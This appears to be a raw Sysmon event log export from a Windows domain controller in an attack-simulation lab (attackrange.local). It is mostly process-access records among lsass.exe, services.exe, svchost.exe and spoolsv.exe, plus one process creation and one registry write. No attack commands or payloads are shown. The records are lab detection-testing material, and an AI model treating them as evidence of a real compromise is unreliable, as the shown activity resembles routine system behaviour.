13:53:21.211{10ACEC4A-853E-5FCF-0B00-000000009101}864908C:\Windows\system32\lsass.exe{10ACEC4A-853E-5FCF-0A00-000000009101}852C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001321Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.211{10ACEC4A-853E-5FCF-0B00-000000009101}864900C:\Windows\system32\lsass.exe{10ACEC4A-853E-5FCF-0A00-000000009101}852C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001320Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.211{10ACEC4A-853E-5FCF-0B00-000000009101}86496C:\Windows\system32\lsass.exe{10ACEC4A-853E-5FCF-0A00-000000009101}852C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001319Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.204{10ACEC4A-853E-5FCF-0B00-000000009101}86496C:\Windows\system32\lsass.exe{10ACEC4A-8551-5FCF-2B00-000000009101}2636C:\Windows\System32\spoolsv.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001318Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.204{10ACEC4A-853E-5FCF-0B00-000000009101}86496C:\Windows\system32\lsass.exe{10ACEC4A-8551-5FCF-2B00-000000009101}2636C:\Windows\System32\spoolsv.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001317Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.199{10ACEC4A-853E-5FCF-0A00-000000009101}8521140C:\Windows\system32\services.exe{10ACEC4A-8551-5FCF-2B00-000000009101}2636C:\Windows\System32\spoolsv.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\system32\services.exe+18ff|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001316Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.192{10ACEC4A-853E-5FCF-0500-000000009101}6442448C:\Windows\system32\csrss.exe{10ACEC4A-8551-5FCF-2B00-000000009101}2636C:\Windows\System32\spoolsv.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000001315Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.192{10ACEC4A-853E-5FCF-0A00-000000009101}852936C:\Windows\system32\services.exe{10ACEC4A-8551-5FCF-2B00-000000009101}2636C:\Windows\System32\spoolsv.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\services.exe+12939|C:\Windows\system32\services.exe+66f4|C:\Windows\system32\services.exe+5154|C:\Windows\system32\services.exe+d7ae|C:\Windows\system32\services.exe+20a11|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000001314Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.178{10ACEC4A-8551-5FCF-2B00-000000009101}2636C:\Windows\System32\spoolsv.exe10.0.14393.3808 (rs1_release.200707-2105)Spooler SubSystem AppMicrosoft® Windows® Operating SystemMicrosoft Corporationspoolsv.exeC:\Windows\System32\spoolsv.exeC:\Windows\system32\NT AUTHORITY\SYSTEM{10ACEC4A-853F-5FCF-E703-000000000000}0x3e70SystemMD5=0105816460F59AAC077848616872DD7C,SHA256=37297B9EED859DBA103252CD3CFDBD88DC752C96D001A3C0E5FBF9F11D2ABAFF,IMPHASH=5788588905781015CF350C5A9ABBA1F2{10ACEC4A-853E-5FCF-0A00-000000009101}852C:\Windows\System32\services.exeC:\Windows\system32\services.exe 10341000x80000000000000001313Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.173{10ACEC4A-853E-5FCF-0B00-000000009101}86496C:\Windows\system32\lsass.exe{10ACEC4A-853E-5FCF-0A00-000000009101}852C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001312Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.173{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-853E-5FCF-0B00-000000009101}864C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001311Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.173{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-853E-5FCF-0B00-000000009101}864C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001310Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.173{10ACEC4A-853E-5FCF-0B00-000000009101}86496C:\Windows\system32\lsass.exe{10ACEC4A-853E-5FCF-0A00-000000009101}852C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001309Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:20.242{10ACEC4A-853E-5FCF-0500-000000009101}6441164C:\Windows\system32\csrss.exe{00000000-0000-0000-0000-000000000000}2452C:\Windows\system32\wermgr.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000001308Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:20.242{10ACEC4A-8541-5FCF-1000-000000009101}11562960C:\Windows\system32\svchost.exe{00000000-0000-0000-0000-000000000000}2452C:\Windows\system32\wermgr.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\wer.dll+6e498|C:\Windows\System32\wer.dll+37734|C:\Windows\System32\wer.dll+38a40|C:\Windows\System32\wer.dll+13ae4|C:\Windows\System32\wer.dll+51b6|c:\windows\system32\wuaueng.dll+d4e38|c:\windows\system32\wuaueng.dll+554a8|c:\windows\system32\wuaueng.dll+4e24b|c:\windows\system32\wuaueng.dll+4e49b|c:\windows\system32\wuaueng.dll+4e5fe|c:\windows\system32\wuaueng.dll+4fb28|c:\windows\system32\wuaueng.dll+5c36f|c:\windows\system32\wuaueng.dll+4d1d5|c:\windows\system32\wuaueng.dll+4c805|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001307Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:15.961{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8541-5FCF-1000-000000009101}1156C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001306Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:15.961{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8541-5FCF-1000-000000009101}1156C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x80000000000000001305Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-SetValue2020-12-08 13:53:14.789{10ACEC4A-853E-5FCF-0B00-000000009101}864C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\Netlogon\Private\IPV6SocketAddressListBinary Data 10341000x80000000000000001304Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:14.774{10ACEC4A-853E-5FCF-0B00-000000009101}864988C:\Windows\system32\lsass.exe{10ACEC4A-854A-5FCF-2800-000000009101}2684C:\Windows\System32\svchost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001303Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:14.774{10ACEC4A-853E-5FCF-0B00-000000009101}864988C:\Windows\system32\lsass.exe{10ACEC4A-854A-5FCF-2800-000000009101}2684C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001302Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:14.774{10ACEC4A-853E-5FCF-0B00-000000009101}864988C:\Windows\system32\lsass.exe{10ACEC4A-854A-5FCF-2800-000000009101}2684C:\Windows\System32\svchost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001301Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:14.774{10ACEC4A-853E-5FCF-0B00-000000009101}864988C:\Windows\system32\lsass.exe{10ACEC4A-854A-5FCF-2800-000000009101}2684C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001300Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:14.774{10ACEC4A-853E-5FCF-0B00-000000009101}864988C:\Windows\system32\lsass.exe{10ACEC4A-854A-5FCF-2800-000000009101}2684C:\Windows\System32\svchost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001299Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:14.774{10ACEC4A-853E-5FCF-0B00-000000009101}864988C:\Windows\system32\lsass.exe{10ACEC4A-854A-5FCF-2800-000000009101}2684C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001298Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:14.774{10ACEC4A-853E-5FCF-0B00-000000009101}864988C:\Windows\system32\lsass.exe{10ACEC4A-854A-5FCF-2800-000000009101}2684C:\Windows\System32\svchost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001297Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:14.774{10ACEC4A-853E-5FCF-0B00-000000009101}864988C:\Windows\system32\lsass.exe{10ACEC4A-854A-5FCF-2800-000000009101}2684C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001296Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 